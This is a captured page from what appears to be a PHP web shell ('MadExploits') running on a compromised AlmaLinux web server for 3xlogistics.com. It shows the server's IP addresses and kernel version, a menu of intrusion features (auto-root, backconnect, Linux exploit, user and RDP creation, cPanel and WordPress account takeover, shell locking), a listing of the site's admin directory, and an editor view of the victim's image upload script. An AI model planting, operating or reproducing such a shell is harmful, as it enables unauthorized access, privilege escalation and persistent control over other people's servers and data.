Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 52.14.131.93
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
3xlogistics.com /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
2Navbar_Side
[ DIR ]
drwxr-xr-x
DropDownCategory
[ DIR ]
drwxr-xr-x
PageWrapper
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
print
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
1First_Head.php
4.48
KB
-rw-r--r--
2Nav_BarTop.php
2.03
KB
-rw-r--r--
2Navbar_Side.php
3
KB
-rw-r--r--
3Page_Wrapper.php
761
B
-rw-r--r--
4End_Head.php
977
B
-rw-r--r--
Category_Content.php
1.06
KB
-rw-r--r--
Category_Content_Language.php
1.19
KB
-rw-r--r--
Home.php
1.13
KB
-rw-r--r--
HomeEdit.php
510
B
-rw-r--r--
Management_Content.php
983
B
-rw-r--r--
Management_Menu.php
1.27
KB
-rw-r--r--
Management_Menu_Create_Form.ph...
797
B
-rw-r--r--
MemberList.php
538
B
-rw-r--r--
Product copy.php
819
B
-rw-r--r--
Product.php
819
B
-rw-r--r--
ProductCategoryEdit.php
520
B
-rw-r--r--
ProductCategoryEdit2.php
558
B
-rw-r--r--
ProductCategoryEdit3.php
521
B
-rw-r--r--
ProductEdit.php
552
B
-rw-r--r--
ProductEdit_Options.php
555
B
-rw-r--r--
ProductEdit_OptionsEdit.php
560
B
-rw-r--r--
Product_Category.php
563
B
-rw-r--r--
Product_Category2.php
560
B
-rw-r--r--
Product_Category3.php
569
B
-rw-r--r--
Product_Dash_Board.php
930
B
-rw-r--r--
Register.php
536
B
-rw-r--r--
RegisterEdit.php
540
B
-rw-r--r--
Setting.php
513
B
-rw-r--r--
about.php
538
B
-rw-r--r--
accounting.php
1.25
KB
-rw-r--r--
amphur.php
1.91
KB
-rw-r--r--
amphurEdit.php
1.45
KB
-rw-r--r--
contact.php
601
B
-rw-r--r--
contactview.php
514
B
-rw-r--r--
creditcheck.php
261
B
-rw-r--r--
index.php
1.11
KB
-rwxr-xr-x
login.php
1.91
KB
-rw-r--r--
showpage.php
514
B
-rw-r--r--
showpageEdit.php
512
B
-rw-r--r--
system_payment.php
702
B
-rw-r--r--
upload_file.php
1020
B
-rw-r--r--
upload_image.php
1.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_image.php
<?php try { // File_Route. $fileRoute = "/upload/IMG_FileEdit/file_"; $fieldname = "file"; // Get filename. $filename = explode(".", $_FILES[$fieldname]["name"]); // Validate uploaded files. // Do not use $_FILES["file"]["type"] as it can be easily forged. $finfo = finfo_open(FILEINFO_MIME_TYPE); // Get temp file name. $tmpName = $_FILES[$fieldname]["tmp_name"]; // Get mime type. $mimeType = finfo_file($finfo, $tmpName); // Get extension. You must include fileinfo PHP extension. $extension = end($filename); // Allowed extensions. $allowedExts = array("gif", "jpeg", "jpg", "png", "svg", "blob"); // Allowed mime types. $allowedMimeTypes = array("image/gif", "image/jpeg", "image/pjpeg", "image/x-png", "image/png", "image/svg+xml"); // Validate image. if (!in_array(strtolower($mimeType), $allowedMimeTypes) || !in_array(strtolower($extension), $allowedExts)) { throw new \Exception("File does not meet the validation."); } // Generate new random name. $name = sha1(microtime()) . "." . $extension; $fullNamePath = dirname(__FILE__) . $fileRoute . $name; // Check server protocol and load resources accordingly. if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") { $protocol = "https://"; } else { $protocol = "http://"; } // Save file in the uploads folder. move_uploaded_file($tmpName, $fullNamePath); // Generate response. $response = new \StdClass; $response->link = $protocol.$_SERVER["HTTP_HOST"].dirname($_SERVER["PHP_SELF"]).$fileRoute . $name; // Send response. echo stripslashes(json_encode($response)); } catch (Exception $e) { // Send error response. echo $e->getMessage(); http_response_code(404); } ?>
Close